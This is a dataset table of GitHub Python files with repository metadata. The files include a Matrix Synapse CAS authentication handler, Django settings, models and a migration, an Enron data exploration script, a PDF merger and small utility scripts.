blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 213 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 246 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bfb8fe372429b608d6e289976184d5a3671112aa | dfe61b9a718c34cbb2c152246bd70f4675765792 | /adjure/models/__init__.py | 3526a58a2075d94808b6bd337514b235922b2f2f | [
"MIT"
] | permissive | bellyfat/adjure | eeda52dc4bdd79baaaf428030fdf1b1cd3b51069 | 974b4465ea9a827074472410d3013c3b5306b5d2 | refs/heads/master | 2022-01-05T15:44:35.931483 | 2019-02-18T20:47:30 | 2019-02-18T21:16:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45 | py | from adjure.models.auth_user import AuthUser
| [
"ben@Bens-MacBook-Pro.local"
] | ben@Bens-MacBook-Pro.local |
7f15a14335ed0c863a97300fe65eedcc2b690e73 | 7ba2c4fb8b61185cc34aaccf9931c75e95ed5ce5 | /practice/explore_enron_data.py | 736db7f87e11d49dc0100e3d285b5a7c857b3eb1 | [] | no_license | vikramriyer/Predict_fraud_using_Machine_Learning | 3b27ca7b047029cb0515e9185958a26f141f4c45 | a618a40649db684c3b834f5ae811584d65018997 | refs/heads/master | 2021-06-22T07:43:44.621860 | 2017-07-26T00:36:22 | 2017-07-26T00:36:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,426 | py | #!/usr/bin/python
"""
Starter code for exploring the Enron dataset (emails + finances);
loads up the dataset (pickled dict of dicts).
The dataset has the form:
enron_data["LASTNAME FIRSTNAME MIDDLEINITIAL"] = { features_dict }
{features_dict} is a dictionary of features associated with that person.
You should explore features_dict as part of the mini-project,
but here's an example to get you started:
enron_data["SKILLING JEFFREY K"]["bonus"] = 5600000
"""
import pickle
count = 0
c = 0
persons_of_interest = []
enron_data = pickle.load(open("../final_project/final_project_dataset.pkl", "r"))
for k in enron_data:
if enron_data[k]['salary'] != 'NaN':
#print enron_data[k]['email_address']
c += 1
if enron_data[k]['poi'] == True:
count += 1
persons_of_interest.append(k)
if 'fastow'.upper() in k:
pass#print enron_data[k]
#print enron_data['COLWELL']
print count
#print persons_of_interest
#print enron_data["LAY KENNETH L"]["total_payments"]
#print c
#print sum([1 for key in enron_data.keys() if enron_data[key]['salary'] != 'NaN'])
#print sum([1 for key in enron_data.keys() if enron_data[key]['email_address'] != 'NaN'])
print sum([1 for key in enron_data.keys() if enron_data[key]['total_payments'] == 'NaN'])
#print len(enron_data)
print sum([1 for key in enron_data.keys() if enron_data[key]['poi'] == True and enron_data[key]['total_payments'] == 'NaN']) | [
"vikram.iyer09@gmail.com"
] | vikram.iyer09@gmail.com |
a891e3d2acbf47e75c7dbb4843e109d1c043dfbb | ebaba64bfe8e2e647c34e2219c924728e084f3a8 | /app/models/common.py | 584e79018139cb9e3e565c3fed02ca73e67dcb64 | [] | no_license | twinstae/realworld-fastapi | e2a40e2299b900cc27e7e3f00f26736310ac27f1 | 9a51784cd3e05b5a85a377865983718a31de93fb | refs/heads/main | 2023-04-17T08:23:15.280461 | 2021-05-04T02:43:06 | 2021-05-04T02:43:06 | 328,108,621 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 498 | py | from datetime import datetime
from pydantic import BaseModel, Field, validator
class DateTimeModelMixin(BaseModel):
created_at: datetime = None # type: ignore
updated_at: datetime = None # type: ignore
@validator("created_at", "updated_at", pre=True)
def default_datetime(
cls, # noqa: N805
value: datetime, # noqa: WPS110
) -> datetime:
return value or datetime.now()
class IDModelMixin(BaseModel):
id_: int = Field(0, alias="id")
| [
"rabolution@gmail.com"
] | rabolution@gmail.com |
5facdbc7160f4c2041e7d9a208b1f07ed0e14ccd | 7179c77f220e5adf1354292c1d3069e0e37bd10f | /Rush00/moviemon/utils/load.py | f5f4d41cc3cde8d89f6706454bd0c0ceb20e7922 | [] | no_license | MishinK/Django_pool | 09d7244e5ba397dba2d3797b0c3fc6b08862d2dd | 484271c63c299c53bf59dacc2412927e818b8096 | refs/heads/main | 2023-09-03T18:14:01.176740 | 2021-11-11T06:23:45 | 2021-11-11T06:23:45 | 426,892,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 381 | py | from django.shortcuts import redirect
from functools import wraps
from moviemon.utils.game import load_session_data
def load_midd(view_function):
@wraps(view_function)
def wrap(request, *args, **kwargs):
data = load_session_data()
if data is None:
return redirect("title")
return view_function(request, *args, **kwargs)
return wrap
| [
"mka456@yandex.ru"
] | mka456@yandex.ru |
4830b0ef10483ac92c978cef7bdf5ac2da64be45 | 7b64171318103d29feb06fed0003b4f9adc6a2c4 | /backend/backend/views.py | 9e1afcae7d37923125e35faa56f075b9e1a9fa81 | [] | no_license | mobuchowski/jnp3 | 25ef5474a9fd7fef15d5fcfc57336904b693b2ba | db0c8e317ba7a3e40c409806ca86b8e6bca857c0 | refs/heads/master | 2023-03-04T19:05:21.156136 | 2017-01-24T15:49:56 | 2017-01-24T15:49:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 69 | py | from api.views import UserDetail
from django.shortcuts import render
| [
"matxxx01@gmail.com"
] | matxxx01@gmail.com |
2a46ee9f78437e46ba7da582c601803165ce6ffe | d6befe88e1bcd00d319ae16f3901908102d18591 | /api/sonetworks/migrations/0017_auto_20170410_2254.py | 44c595b658d5d7393887b0fa8b3ff66931ae6160 | [
"MIT"
] | permissive | ecelis/semitki | b50c8e211462ef0a98a60ed4b9643be3faea1731 | 6c7cbb2bb2260db79478de48a9b2e71b8ed633ff | refs/heads/master | 2021-06-24T03:02:56.696206 | 2017-06-20T16:04:36 | 2017-06-20T16:04:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,709 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-04-10 22:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
dependencies = [
('sonetworks', '0016_remove_staticpage_page'),
]
operations = [
migrations.CreateModel(
name='Campaign',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('name', models.CharField(max_length=140)),
('description', models.CharField(max_length=256)),
('isactive', models.BooleanField(default=True)),
('valid_to', models.DateField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='Phase',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('name', models.CharField(max_length=140)),
('description', models.CharField(max_length=256)),
('isactive', models.BooleanField(default=True)),
('validTo', models.DateField(blank=True, null=True)),
('campaign', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sonetworks.Campaign')),
],
),
migrations.CreateModel(
name='SocialAccountGroup',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('isactive', models.BooleanField(default=True)),
('validTo', models.DateField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='SocialGroup',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('name', models.CharField(max_length=140)),
('description', models.CharField(max_length=256)),
('isactive', models.BooleanField(default=True)),
('validTo', models.DateField(blank=True, null=True)),
],
),
migrations.RemoveField(
model_name='socialaccountsgroup',
name='socialaccounts',
),
migrations.RemoveField(
model_name='topic',
name='project',
),
migrations.RemoveField(
model_name='post',
name='topic',
),
migrations.AddField(
model_name='socialaccount',
name='isactive',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='socialaccount',
name='validTo',
field=models.DateField(blank=True, null=True),
),
migrations.AlterField(
model_name='post',
name='date',
field=models.DateTimeField(),
),
migrations.DeleteModel(
name='Project',
),
migrations.DeleteModel(
name='SocialAccountsGroup',
),
migrations.DeleteModel(
name='Topic',
),
migrations.AddField(
model_name='socialaccountgroup',
name='socialaccount',
field=models.ManyToManyField(blank=True, to='sonetworks.SocialAccount'),
),
migrations.AddField(
model_name='socialaccountgroup',
name='socialgroup',
field=models.ManyToManyField(blank=True, to='sonetworks.SocialGroup'),
),
]
| [
"gvaldez@gmail.com"
] | gvaldez@gmail.com |
2d804bd06aa80f5d4e72d9c9eb4591fccfcb358f | 02dc1f70da529c7c2aa45dcfe5e0a3aeeb1f98cc | /src/099_recover_binary_search_tree/099_recover_binary_search_tree.py | 007b57cf0c699c85f313ec566a75d2ce5c5492ac | [] | no_license | ypliu/leetcode-python | 2a5a14de6310cae19b9cc42091d81586e697fffb | 13e61c13c406a73debcfc996937cf16f715d55d1 | refs/heads/master | 2020-03-27T06:17:32.303442 | 2019-02-24T14:50:11 | 2019-02-24T14:50:11 | 146,094,735 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,395 | py | # Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def recoverTree(self, root):
"""
:type root: TreeNode
:rtype: void Do not return anything, modify root in-place instead.
"""
if not root:
return
first_node, second_node = self.inorderTraversalStack(root)
if first_node and second_node:
first_node.val, second_node.val = second_node.val, first_node.val
#print first_node.val, second_node.val
def inorderTraversalStack(self, root):
pre_node = first_node = second_node = None
temp = root; stack = []
while temp or stack:
while temp:
stack.append(temp)
temp = temp.left
temp = stack.pop()
if pre_node and pre_node.val >= temp.val:
if not first_node:
first_node = pre_node
second_node = temp
pre_node = temp
temp = temp.right
return first_node, second_node
# debug
s = Solution()
root = TreeNode(1)
root.left = TreeNode(3)
root.left.right = TreeNode(2)
s.recoverTree(root)
root = TreeNode(3)
root.left = TreeNode(1)
root.right = TreeNode(4)
root.right.left = TreeNode(2)
s.recoverTree(root)
| [
"noreply@github.com"
] | ypliu.noreply@github.com |
ea1355bf106fc1f0df6f659e51c72ad48cb1c02a | dd12c10ca55da8bac3bdf87d474885aef956091e | /leap_year.py | db0c05a59a983f3252fcb64abf176a8100b3bda8 | [] | no_license | Diego91RA/school_2020_examples | 6a2232210bd4c70d0b4857c6faa69397db664c42 | 68cc411defe5def6702ba612768dfb498c62fefa | refs/heads/master | 2022-11-26T10:11:45.398232 | 2020-07-29T11:38:35 | 2020-07-29T11:38:35 | 282,643,462 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 311 | py | l = []
for i in range(2020, 10001):
if i % 4 == 0:
if i % 400 == 0:
l.append(i)
elif i % 100 == 0:
pass
else:
l.append(i)
print(l)
print(len(l))
c = 0
import calendar
for i in range(2020, 10001):
if calendar.isleap(i):
c += 1
print(c) | [
"13482645+Diego91RA@users.noreply.github.com"
] | 13482645+Diego91RA@users.noreply.github.com |
09a6e5cb15cb9e1a4d509bc8324a6e269ca25419 | 9ef64268573b24190aba70eabf3259f6cba4b95a | /synapse/handlers/cas_handler.py | 5060936f943a71e0eca920c51aea6e3e6fca81e9 | [
"Apache-2.0"
] | permissive | Zachinquarantine/synapse | c5f06b1dce8260f5adf17f445e6c2cb14b0b85da | abc814dcbf559282220c35a45b3959bb23a2ed50 | refs/heads/develop | 2023-04-10T10:55:09.150028 | 2021-04-09T12:11:51 | 2021-04-09T12:11:51 | 321,198,871 | 0 | 0 | Apache-2.0 | 2020-12-14T01:22:15 | 2020-12-14T01:22:14 | null | UTF-8 | Python | false | false | 14,232 | py | # -*- coding: utf-8 -*-
# Copyright 2020 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import urllib.parse
from typing import TYPE_CHECKING, Dict, List, Optional
from xml.etree import ElementTree as ET
import attr
from twisted.web.client import PartialDownloadError
from synapse.api.errors import HttpResponseException
from synapse.handlers.sso import MappingException, UserAttributes
from synapse.http.site import SynapseRequest
from synapse.types import UserID, map_username_to_mxid_localpart
if TYPE_CHECKING:
from synapse.server import HomeServer
logger = logging.getLogger(__name__)
class CasError(Exception):
"""Used to catch errors when validating the CAS ticket."""
def __init__(self, error, error_description=None):
self.error = error
self.error_description = error_description
def __str__(self):
if self.error_description:
return "{}: {}".format(self.error, self.error_description)
return self.error
@attr.s(slots=True, frozen=True)
class CasResponse:
username = attr.ib(type=str)
attributes = attr.ib(type=Dict[str, List[Optional[str]]])
class CasHandler:
"""
Utility class for to handle the response from a CAS SSO service.
Args:
hs
"""
def __init__(self, hs: "HomeServer"):
self.hs = hs
self._hostname = hs.hostname
self._store = hs.get_datastore()
self._auth_handler = hs.get_auth_handler()
self._registration_handler = hs.get_registration_handler()
self._cas_server_url = hs.config.cas_server_url
self._cas_service_url = hs.config.cas_service_url
self._cas_displayname_attribute = hs.config.cas_displayname_attribute
self._cas_required_attributes = hs.config.cas_required_attributes
self._http_client = hs.get_proxied_http_client()
# identifier for the external_ids table
self.idp_id = "cas"
# user-facing name of this auth provider
self.idp_name = "CAS"
# we do not currently support brands/icons for CAS auth, but this is required by
# the SsoIdentityProvider protocol type.
self.idp_icon = None
self.idp_brand = None
self.unstable_idp_brand = None
self._sso_handler = hs.get_sso_handler()
self._sso_handler.register_identity_provider(self)
def _build_service_param(self, args: Dict[str, str]) -> str:
"""
Generates a value to use as the "service" parameter when redirecting or
querying the CAS service.
Args:
args: Additional arguments to include in the final redirect URL.
Returns:
The URL to use as a "service" parameter.
"""
return "%s?%s" % (
self._cas_service_url,
urllib.parse.urlencode(args),
)
async def _validate_ticket(
self, ticket: str, service_args: Dict[str, str]
) -> CasResponse:
"""
Validate a CAS ticket with the server, and return the parsed the response.
Args:
ticket: The CAS ticket from the client.
service_args: Additional arguments to include in the service URL.
Should be the same as those passed to `handle_redirect_request`.
Raises:
CasError: If there's an error parsing the CAS response.
Returns:
The parsed CAS response.
"""
uri = self._cas_server_url + "/proxyValidate"
args = {
"ticket": ticket,
"service": self._build_service_param(service_args),
}
try:
body = await self._http_client.get_raw(uri, args)
except PartialDownloadError as pde:
# Twisted raises this error if the connection is closed,
# even if that's being used old-http style to signal end-of-data
body = pde.response
except HttpResponseException as e:
description = (
(
'Authorization server responded with a "{status}" error '
"while exchanging the authorization code."
).format(status=e.code),
)
raise CasError("server_error", description) from e
return self._parse_cas_response(body)
def _parse_cas_response(self, cas_response_body: bytes) -> CasResponse:
"""
Retrieve the user and other parameters from the CAS response.
Args:
cas_response_body: The response from the CAS query.
Raises:
CasError: If there's an error parsing the CAS response.
Returns:
The parsed CAS response.
"""
# Ensure the response is valid.
root = ET.fromstring(cas_response_body)
if not root.tag.endswith("serviceResponse"):
raise CasError(
"missing_service_response",
"root of CAS response is not serviceResponse",
)
success = root[0].tag.endswith("authenticationSuccess")
if not success:
raise CasError("unsucessful_response", "Unsuccessful CAS response")
# Iterate through the nodes and pull out the user and any extra attributes.
user = None
attributes = {} # type: Dict[str, List[Optional[str]]]
for child in root[0]:
if child.tag.endswith("user"):
user = child.text
if child.tag.endswith("attributes"):
for attribute in child:
# ElementTree library expands the namespace in
# attribute tags to the full URL of the namespace.
# We don't care about namespace here and it will always
# be encased in curly braces, so we remove them.
tag = attribute.tag
if "}" in tag:
tag = tag.split("}")[1]
attributes.setdefault(tag, []).append(attribute.text)
# Ensure a user was found.
if user is None:
raise CasError("no_user", "CAS response does not contain user")
return CasResponse(user, attributes)
async def handle_redirect_request(
self,
request: SynapseRequest,
client_redirect_url: Optional[bytes],
ui_auth_session_id: Optional[str] = None,
) -> str:
"""Generates a URL for the CAS server where the client should be redirected.
Args:
request: the incoming HTTP request
client_redirect_url: the URL that we should redirect the
client to after login (or None for UI Auth).
ui_auth_session_id: The session ID of the ongoing UI Auth (or
None if this is a login).
Returns:
URL to redirect to
"""
if ui_auth_session_id:
service_args = {"session": ui_auth_session_id}
else:
assert client_redirect_url
service_args = {"redirectUrl": client_redirect_url.decode("utf8")}
args = urllib.parse.urlencode(
{"service": self._build_service_param(service_args)}
)
return "%s/login?%s" % (self._cas_server_url, args)
async def handle_ticket(
self,
request: SynapseRequest,
ticket: str,
client_redirect_url: Optional[str],
session: Optional[str],
) -> None:
"""
Called once the user has successfully authenticated with the SSO.
Validates a CAS ticket sent by the client and completes the auth process.
If the user interactive authentication session is provided, marks the
UI Auth session as complete, then returns an HTML page notifying the
user they are done.
Otherwise, this registers the user if necessary, and then returns a
redirect (with a login token) to the client.
Args:
request: the incoming request from the browser. We'll
respond to it with a redirect or an HTML page.
ticket: The CAS ticket provided by the client.
client_redirect_url: the redirectUrl parameter from the `/cas/ticket` HTTP request, if given.
This should be the same as the redirectUrl from the original `/login/sso/redirect` request.
session: The session parameter from the `/cas/ticket` HTTP request, if given.
This should be the UI Auth session id.
"""
args = {}
if client_redirect_url:
args["redirectUrl"] = client_redirect_url
if session:
args["session"] = session
try:
cas_response = await self._validate_ticket(ticket, args)
except CasError as e:
logger.exception("Could not validate ticket")
self._sso_handler.render_error(request, e.error, e.error_description, 401)
return
await self._handle_cas_response(
request, cas_response, client_redirect_url, session
)
async def _handle_cas_response(
self,
request: SynapseRequest,
cas_response: CasResponse,
client_redirect_url: Optional[str],
session: Optional[str],
) -> None:
"""Handle a CAS response to a ticket request.
Assumes that the response has been validated. Maps the user onto an MXID,
registering them if necessary, and returns a response to the browser.
Args:
request: the incoming request from the browser. We'll respond to it with an
HTML page or a redirect
cas_response: The parsed CAS response.
client_redirect_url: the redirectUrl parameter from the `/cas/ticket` HTTP request, if given.
This should be the same as the redirectUrl from the original `/login/sso/redirect` request.
session: The session parameter from the `/cas/ticket` HTTP request, if given.
This should be the UI Auth session id.
"""
# first check if we're doing a UIA
if session:
return await self._sso_handler.complete_sso_ui_auth_request(
self.idp_id,
cas_response.username,
session,
request,
)
# otherwise, we're handling a login request.
# Ensure that the attributes of the logged in user meet the required
# attributes.
if not self._sso_handler.check_required_attributes(
request, cas_response.attributes, self._cas_required_attributes
):
return
# Call the mapper to register/login the user
# If this not a UI auth request than there must be a redirect URL.
assert client_redirect_url is not None
try:
await self._complete_cas_login(cas_response, request, client_redirect_url)
except MappingException as e:
logger.exception("Could not map user")
self._sso_handler.render_error(request, "mapping_error", str(e))
async def _complete_cas_login(
self,
cas_response: CasResponse,
request: SynapseRequest,
client_redirect_url: str,
) -> None:
"""
Given a CAS response, complete the login flow
Retrieves the remote user ID, registers the user if necessary, and serves
a redirect back to the client with a login-token.
Args:
cas_response: The parsed CAS response.
request: The request to respond to
client_redirect_url: The redirect URL passed in by the client.
Raises:
MappingException if there was a problem mapping the response to a user.
RedirectException: some mapping providers may raise this if they need
to redirect to an interstitial page.
"""
# Note that CAS does not support a mapping provider, so the logic is hard-coded.
localpart = map_username_to_mxid_localpart(cas_response.username)
async def cas_response_to_user_attributes(failures: int) -> UserAttributes:
"""
Map from CAS attributes to user attributes.
"""
# Due to the grandfathering logic matching any previously registered
# mxids it isn't expected for there to be any failures.
if failures:
raise RuntimeError("CAS is not expected to de-duplicate Matrix IDs")
# Arbitrarily use the first attribute found.
display_name = cas_response.attributes.get(
self._cas_displayname_attribute, [None]
)[0]
return UserAttributes(localpart=localpart, display_name=display_name)
async def grandfather_existing_users() -> Optional[str]:
# Since CAS did not always use the user_external_ids table, always
# to attempt to map to existing users.
user_id = UserID(localpart, self._hostname).to_string()
logger.debug(
"Looking for existing account based on mapped %s",
user_id,
)
users = await self._store.get_users_by_id_case_insensitive(user_id)
if users:
registered_user_id = list(users.keys())[0]
logger.info("Grandfathering mapping to %s", registered_user_id)
return registered_user_id
return None
await self._sso_handler.complete_sso_login_request(
self.idp_id,
cas_response.username,
request,
client_redirect_url,
cas_response_to_user_attributes,
grandfather_existing_users,
)
| [
"noreply@github.com"
] | Zachinquarantine.noreply@github.com |
3c5c399e0a23305be3ae7f2a48763bcbf20f2506 | 10134a8b3ffaca93cd2cc4a7adb8c676947cf1bd | /Scripts/merged.py | ccc2c0db5f18f002c537ef2898d2c20175f6c244 | [
"MIT"
] | permissive | usman-dev/PDFs-TextExtract | 7cb74db114a49dfbc939dae0be48b316f37f99d9 | f07aadb3057bf98fce63269bc2ba252b00efa4a6 | refs/heads/master | 2023-04-07T20:34:17.893296 | 2021-04-10T21:38:42 | 2021-04-10T21:38:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 583 | py | import glob
from PyPDF2 import PdfFileWriter, PdfFileReader
def merger(output_path, input_paths):
pdf_writer = PdfFileWriter()
for path in input_paths:
pdf_reader = PdfFileReader(path)
for page in range(pdf_reader.getNumPages()):
pdf_writer.addPage(pdf_reader.getPage(page))
with open(output_path, 'wb') as fh:
pdf_writer.write(fh)
if __name__ == '__main__':
paths = glob.glob('../PDFs-TextExtract/samples/*.pdf')
paths.sort()
merger('../PDFs-TextExtract/pdf_merged.pdf', paths)
print("Done, PDF Merged successfully..") | [
"ahmedkhemiri24@outlook.fr"
] | ahmedkhemiri24@outlook.fr |
3183ecf1900a24188a08ca3f2ea88ac1e56e75d8 | 33c346f7eaef356b84f63622acb79619b7a685ed | /apiserver/server/libs/Coder.py | 5fe93cc34d90731584172c79f7e5f24ed00c6dc1 | [] | no_license | rhdtl78/Open-Bigdata-Visualization-Analysis- | 90966d9ed65edfa4b0c5f7685f627b5e969d9b63 | b156d03ed52dfba81b1758c7edc90249211768c4 | refs/heads/master | 2023-01-21T04:59:51.325739 | 2019-09-02T05:03:45 | 2019-09-02T05:03:45 | 138,969,085 | 3 | 1 | null | 2023-01-09T11:27:29 | 2018-06-28T05:13:34 | JavaScript | UTF-8 | Python | false | false | 1,492 | py | import pandas as pd
import numpy
class Coder:
def __init__(self):
self.escapeList = []
# self.escape = {
# "&35;": "#",
# "&36;": "$",
# "&46;": ".",
# "&91;": "[",
# "&93;": "]",
# "&47;": "/",
# "#": "&35;",
# "$": "&36;",
# ".": "&46;",
# "[": "&91;",
# "]": "&93;",
# "/": "&47;"
# }
def escape(self, data):
dataList = []
for value in data.values():
dataList.append(value)
# print(dataList)
postData = pd.DataFrame(dataList)
# print(seqNames, postData.columns.values.tolist())
colName = postData.columns.values.tolist()
for idx, element in enumerate(colName):
# print("before= ", colName[idx])
element = element.replace("&35;", "#")
element = element.replace("&36;", "$")
element = element.replace("&46;", ".")
element = element.replace("&91;", "[")
element = element.replace("&93;", "]")
element = element.replace("&47;", "/")
colName[idx] = element
# print("element= ", element)
# print("after= ",colName[idx])
# print("colName = ",colName)
postData.columns = colName
# for idx, element in enumerate(seqNames):
# postData.columns.values[idx] = element
return postData
| [
"rhdtl78@gmail.com"
] | rhdtl78@gmail.com |
8bcfcf6a35cb053347ebb04734d81c1d81d8ba98 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_53/278.py | 96c372a1906d7ba215f82dabd1b59a7ee8d0f1b0 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | #!/usr/bin/python
for i in range(1, int(raw_input())+1):
N, K = map(int, raw_input().split())
result = 'ON'
for j in range(N):
if K & (1<<j) == 0:
result = 'OFF'
break
print 'Case #%d: %s' % (i, result)
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
64ab96786261069745119f13da7c1a8d8eaa975a | d32d727252dbda22cd3d4b68c0e6f01abf8c7549 | /src/tweetme/views.py | a092fa8ac4811fa167aa58886b6375a73299d7a8 | [] | no_license | chintan2011/tweetme | aa6fa7666692ccb3bc7e84ceb3fd1b5227b289cb | a7e09cf1e88950bad7d50a1f137cb3762e4bab33 | refs/heads/master | 2020-03-23T06:30:44.815158 | 2018-10-11T02:00:17 | 2018-10-11T02:00:17 | 141,213,289 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 140 | py | from django.shortcuts import render
#retrieve
# GET -- templates from home.html
def home(request):
return render(request,"home.html",{}) | [
"chintan2011@gmail.com"
] | chintan2011@gmail.com |
70bc6a51ddc9d9ad4fc02a3e8c912d43e224c8ee | c3017c1dbfaf963679c9833e64fe71f0e355c110 | /user_profile/migrations/0004_auto_20210407_1755.py | 6380c80e971eb891a612854fbf42aa763a873b24 | [] | no_license | Lokker29/fun_queue | f9e2abca6e12ba2f3c09c48a8281ea36425c3de0 | 894b501d18c2996c291b021f92dca4e93198d3ff | refs/heads/main | 2023-04-04T16:47:09.024952 | 2021-04-09T05:03:18 | 2021-04-09T05:03:18 | 356,141,290 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 781 | py | # Generated by Django 3.2 on 2021-04-07 17:55
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('user_profile', '0003_unigroup'),
]
operations = [
migrations.AlterModelOptions(
name='unigroup',
options={'verbose_name': 'Університетська група', 'verbose_name_plural': 'Університетські групи'},
),
migrations.AddField(
model_name='user',
name='uni_group',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='user_profile.unigroup', verbose_name='Університетська група'),
),
]
| [
"bohdan.bilokon@raccoongang.com"
] | bohdan.bilokon@raccoongang.com |
f5b8678585e77ba97a9bda55aebd96c14fe54d1e | e8a6b1a3d378ac212afee93b1cdb68ae009edbcd | /uhac/uhac/settings.py | f0dc8acbc5b641b854bf476a83bf4e00a265bd78 | [] | no_license | SmbCantos/UHACK3 | 33e27163bebd884ea3b9efde58f735c4bd267980 | 71233a6b54fb537ff00671456c24735a3318bbec | refs/heads/master | 2021-06-11T11:36:32.405493 | 2016-11-26T13:08:02 | 2016-11-26T13:08:02 | 74,825,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,113 | py | """
Django settings for uhac project.
Generated by 'django-admin startproject' using Django 1.10.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'z$2c2r+cfz_!^mtj@s_z-y^n*t^$peyn*ck(z_ah2yx)ok)9ma'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'home',
'chat'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'uhac.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'uhac.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
| [
"fjcamillo.dev@gmail.com"
] | fjcamillo.dev@gmail.com |
